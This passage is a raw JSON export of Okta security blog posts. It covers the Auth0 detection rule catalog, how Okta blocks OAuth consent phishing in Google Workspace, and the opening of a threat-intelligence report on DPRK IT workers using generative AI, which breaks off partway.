\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"Sigma\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\":\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" All detections are available in the\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sigmahq.io/docs/basics/rules.html\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Sigma format\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". You can use a Sigma converter tool \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/SigmaHQ/sigma-cli\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"sigma-cli\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" to translate these universal rules into the specific query language for your SIEM or logging tool.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Integrate with Your Tooling:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Extract the included queries and integrate them into your existing security monitoring and alerting workflows. This allows you to leverage your current logging tools to detect sophisticated threats against your Auth0 tenant.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Explore Example Detections:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" To help you get started, the catalog includes a variety of examples that highlight its potential. These cover a range of threats, such as:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Suspicious Tenant Settings:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Detections for changes to security-critical settings, like an IP being added to an allowlist or the deactivation of attack protection features.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Administrator Behavior:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Rules for detecting suspicious activities by administrators, such as copying of the most powerful tokens and checking applications’ secrets. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Attacker Behavior:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Queries that identify known attack patterns, like SMS pumping attempts (e.g. \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections/blob/260efc3bc0bb3dd81788c1ca13c6be24e7ffe098/detections/sms_bombarding.yml\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"sms_bombarding.yaml\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\") or refresh token rotation failures.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"ordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Your Contribution Matters\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"If you identify a gap in our current detection coverage or encounter an issue, we encourage you to open a \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections/issues\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"GitHub Issue\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections/blob/260efc3bc0bb3dd81788c1ca13c6be24e7ffe098/CONTRIBUTING.md\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"contribute directly\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". Even better, submit your own detection rules via a \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections/pulls\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"pull request\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" to share your expertise and help the entire community become more resilient.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"Mathew Woodyard contributed to this post.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"The Auth0 Customer Detection Catalog is an open-source repository of detection rules designed to help the security teams at Auth0 customers to proactively identify and respond to security threats."},"updatedAt":"2025-08-27T08:29:13.811Z","secAuthor":[{"id":"5b413046-3f81-5938-bcaf-2631feccae6a","bio":{"bio":"Maria Vasilevskaya is a leading Identity Defense Security Engineer at Okta. With her extensive experience in identity security, she has held diverse roles including security executive advisory, professional consulting services, identity and security solutions architecture, and solutions engineering. Her primary objective at Okta is to empower customers in maintaining robust security postures by offering expert assistance during critical incidents and providing strategic advice on implementing security practices to prevent future crises.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5I9s1hF8KWpGBmULB45xsz/0c88ef2e82d499d9b21fe261bdc645d0/Maria_Vasilevskaya_1753479368125001xuTE.png"},"name":"Maria Vasilevskaya","jobTitle":"Principal Security Engineer","slug":"/hackers/maria-vasilevskaya","node_locale":"en"}]},{"slug":"/controllingoauthsprawl","id":"71595802-b687-5c5b-a6a9-63d2bf663cd9","title":"Controlling Cross-App Data Sprawl in Google Workspace","date":"2025-07-31T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the most difficult challenges in third party risk management (TPRM) is how to effectively manage application sprawl. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It’s possible, but painful to allowlist apps at the operating system level using execution control tools. It’s possible, but painful to allowlist browser extensions using managed or isolated browsers. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It’s also painful to manage the ability of users to authorise third party applications to access data in sanctioned SaaS platforms, such as Microsoft 365 or Google Workspace. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For many years, the default configuration in productivity platforms was to allow users to provide their consent to allow third party apps to access data in their account using OAuth consent grants.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This was empowering for individual (consumer) users, and facilitated strong growth in these platform ecosystems. It wasn’t so rosy for the enterprise, however, which now had to contend with users sharing unbridled access to corporate-owned resources. The risks were exacerbated because the tools to manage OAuth content grants were \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://risky.biz/newsletter22/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"gated by premium licenses\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OAuth Consent Phishing\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As a result, legitimate OAuth apps have become a prime target for attackers and rogue OAuth apps have become a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.sekoia.io/targeted-supply-chain-attack-against-chrome-browser-extensions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"useful tool for phishing enterprise users\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In an OAuth Consent Phishing attack, social engineers create a pretext that convinces users to allow a third-party application to access data in their account. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Public examples of these attacks have impersonated trusted entities such as:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://risky.biz/newsletter15/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Email filtering software\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (e.g. “Please update your email security extension”) \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.sekoia.io/targeted-supply-chain-attack-against-chrome-browser-extensions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Google Developer Support\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (e.g. “Your item is at risk of being removed from the Chrome web store. Please accept our policies to continue publishing your products”) \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.bleepingcomputer.com/news/security/sans-shares-details-on-attack-that-led-to-their-data-breach/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"internal HR team\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (e.g. a shared file with the words “July bonus” in the filename)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You can’t blame the user for these attacks. In these examples, developers of browser extensions and even security experts at the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://risky.biz/newsletter22/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"SANS Institute\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (yes, the guys that train cybersecurity professionals) were duped into allowing rogue apps to raid their inboxes, wikis and calendars. This is an attack that can trick just about anybody.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The risk is exacerbated in environments where an administrative user performs their administrative tasks and their general productivity work using the same account: one erroneous consent and they can easily give away the keys to the kingdom. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tackling unsanctioned apps at Okta\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A few months ago, concerns over OAuth consent grants resurfaced after Patrick Opet, Chief Information Security Officer at JP Morgan, wrote an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.jpmorgan.com/technology/technology-blog/open-letter-to-our-suppliers\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"open letter to third-party suppliers\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" expressing his anxiety about the erosion of traditional enterprise boundaries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"His primary concern was integration patterns that enable users to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"create direct, often unchecked interactions between third-party services and firms’ sensitive internal resources.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’ve had to tackle this internally at Okta. Our team has blocked thousands of attempts by corporate users to provide consent to OAuth applications to access data in their Google Workspace accounts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The vast majority of these requests were for app scripts developed by Okta staff who wanted to extend the functionality of Google Sheets or Google Calendar. Okta is an organization that prides itself on employees being “builders and owners” with the technical skills to automate their way out of problems. So the key to a good security program is to find safe ways for them to experiment. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security tackled this problem internally by:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"configuring our Workspace environment to deny user consent to add new applications by default, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"making it as easy as possible for legitimate apps to be allowlisted, and \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"assigning ownership and monitoring activity in allowlisted applications.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a user attempts to consent to an unsanctioned application, the request is denied (see image below). The user is presented with instructions on how to file a ticket to have the application reviewed by Okta’s Third Party Risk Management (TPRM) team. The process requires the user to provide a business justification for adding the application. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"yTvcSJHL7FShGEegrNbzQ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The TPRM team assesses the business case, whether the application was developed by an approved vendor, and if so, whether the scope of the integration is appropriate for the use case. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Often applications are only allowlisted after the scope of the integration is appropriately minimized, and a service account is configured to manage the integration.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you need to tackle a backlog of integrated apps, Google Workspace includes \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.google.com/a/answer/7281227?sjid=15614519911387360251-NC\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"administrative tools\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that allow administrators to filter app integrations according to whether they are verified, which users or groups can access them and the allowed scopes for the app. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The world needs cross-app access!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security was only able to manage what data stored in Google Workspace could be shared with other third party apps because Google built the required administrative controls and Okta was licensed to use them.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What about all the other apps? The average enterprise has 247 apps integrated in Okta, according to Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Businesses at Work\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" report. It’s naive to expect that all of those SaaS companies have the capability and resources to develop bespoke management capabilities to the degree Google can, or that enterprise CSOs have the resources to configure cross-app sharing in 200+ different consoles!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So ultimately, if we want to solve the problem of cross-app data sharing a scale, we believe these cross-application authorization flows need to be managed centrally by the CISO, using a centralized Identity solution, rather than within each individual application. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With this in mind, Okta recently proposed \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/integrations/cross-app-access/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cross-App Access\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", a method of securing agent-to-app and app-to-app access. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To learn more about securing app-to-app access, you can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/identity-summit/securing-agentic-ai/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"register\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to join our upcoming seminar.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"The world needs a better way to manage app-to-app access."},"updatedAt":"2025-07-31T12:37:20.996Z","secAuthor":[{"id":"fc46d989-8232-5b6d-b14b-0773571a4d5c","bio":{"bio":"Lana Grechko is a Director of Business Technology Security at Okta. Lana leads a high-impact team focused on securing corporate infrastructure and driving key security initiatives across Identity and Access Management (IAM), Infrastructure Security, and Federal Compliance. Partnering closely with engineering, security, and BT teams, she designs and implements strategies that align security with business goals. Prior to Okta, Lana led the design and implementation of the KYC and AML Programs at Bank of West/BNP Paribas. Outside of work, she is San Francisco-based and enjoys playing tennis, pickleball, and reading.
"},"image":null,"name":"Lana Grechko","jobTitle":"Director of Business Technology, Security","slug":"hackers/lana-grechko","node_locale":"en"},{"id":"c3f1a2c5-fd9d-5675-9915-c3574309e91c","bio":{"bio":"Mike Hennessey is an Enterprise Security Architect at Okta. He is a passionate advocate for modern cybersecurity paradigms and specializes in building resilient and intelligent security frameworks that go beyond traditional perimeters and focuses on enabling secure access and protecting critical data in today's dynamic threat landscape. Mike has spearheaded multiple initiatives in Zero Trust network architecture, refining identity access management, implementing contextual access controls, and fortifying data protection strategies. His expertise lies in translating complex security challenges into practical, scalable solutions. When not dissecting network packets or architecting secure systems, Mike is navigating the joyful chaos of being a father to three energetic kids, often finding real-world parallels to the importance of strong boundaries and adaptive strategies.
"},"image":null,"name":"Mike Hennessey","jobTitle":"Enterprise Security Architect","slug":"/hackers-mike-hennessey","node_locale":"en"},{"id":"28ee0ce3-3827-537f-adee-23f41419d16e","bio":{"bio":"Mat Clinton is a Senior Engineering Manager at Okta. He has a background in software development working on internal tools, infrastructure, and security focussed automation at some of the most well-known companies in the industry. Mat and his team’s contributions at Okta push forward the company’s OSIC goals, in pursuit of being the most secure company in the world, while also balancing the needs of productivity enablement for our internal teams. Mat’s recent focus has been related to safe AI usage at Okta through his work on the internal AI Governance board where they evaluate a constant stream of new AI features being released by SAAS providers. Outside of work, Mat likes to spend time at the beach surfing, playing golf with friends, and automating things around the house.
"},"image":null,"name":"Mat Clinton","jobTitle":"Senior Engineering Manager","slug":"/hackers/mat-clinton","node_locale":"en"}]},{"slug":"/articles/2025/04/GenAIDPRK","id":"9230aba7-8ff9-5067-a3c1-e84dd0113f50","title":"How AI services power the DPRK’s IT contracting scams ","date":"2025-04-24T22:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past few months, Okta Threat Intelligence conducted in-depth research into online services used by individuals identified by US authorities and trusted third parties as agents for the Democratic People’s Republic of Korea (DPRK).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our research finds that generative artificial intelligence (GenAI) is playing an integral role in how North Korean nationals gain employment in remote technical roles around the globe, in what some researchers refer to as “DPRK IT Workers” or “Wagemole” campaigns. \\n\\nGenAI is used to create compelling personas at numerous stages of the job application and interview process. Once employed, GenAI tools are also used to assist in maintaining multiple simultaneous roles to earn revenue for the state.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has observed multiple AI-enhanced services used to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Manage the communications of multiple personas and their numerous mobile phone accounts, instant messaging accounts, email accounts and other related chat services behind a “single pane of glass”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Translate, transcribe and summarize communications\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Generate and critique CVs and cover letters \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conduct mock job interviews via chat and webcam\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Test and improve the likelihood of any given job application passing automated checks\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has also observed facilitator use of online shipping and logistics services. We hypothesise that these services are used to redirect company-issued devices to “laptop farms” operated by facilitators based in Western countries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Background\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/archives/opa/pr/fourteen-north-korean-nationals-indicted-carrying-out-multi-year-fraudulent-information\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"arrests and indictments\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" have revealed the scale at which individuals operating on behalf of the DPRK have been mobilized into neighbouring countries to gain fraudulent employment in organizations across the globe.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The primary objective of these schemes is to raise funds for the DPRK and compensate for the significant financial sanctions applied to the North Korean regime. US agencies have also identified several outlier cases in which the access to systems provided for employment was used to facilitate espionage or data extortion.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The targets for these fraudulent schemes appear opportunistic and based on the availability of remote technical roles. The employers most at-risk are technology companies that are more likely to accept remote candidates for IT or software engineering roles, often on a contingent basis. However, these campaigns also extend to industry verticals well beyond the technology sector. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has worked with highly targeted customers and partners, with a view to developing preventative controls for this unique threat model. In the process, Okta has revised our own onboarding processes, shared awareness collateral and built out numerous methods of detection. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The research had a direct influence on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"feature enhancements\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" built into Okta Workforce Identity, such as ID verification services, that Okta customers can use to reduce their exposure to this threat. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Facilitators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our understanding of this threat is shaped by the unique insight Okta Threat Intelligence can glean into the tools used by those individuals identified as “facilitators” of fraudulent employment schemes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These facilitators provide the necessary in-country support, technical infrastructure and/or legitimate business cover to help individuals from sanctioned countries gain and maintain employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators already apprehended by law enforcement in the United States are alleged to have knowingly provided a range of support services to DPRK nationals:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Direct assistance in the recruitment process\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A domestic address for the shipment of company-issued devices\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to legitimate identity documents\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Operating company-issued devices on the remote worker’s behalf\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Installing remote management and monitoring (RMM) tools on the device to facilitate the remote work\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authenticating, where necessary, on the remote worker’s behalf\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One Arizona-based \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"“laptop farm” operation\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" exposed in May 2024 is alleged to have assisted in the placement of over 300 individuals in technical positions across the United States. In another 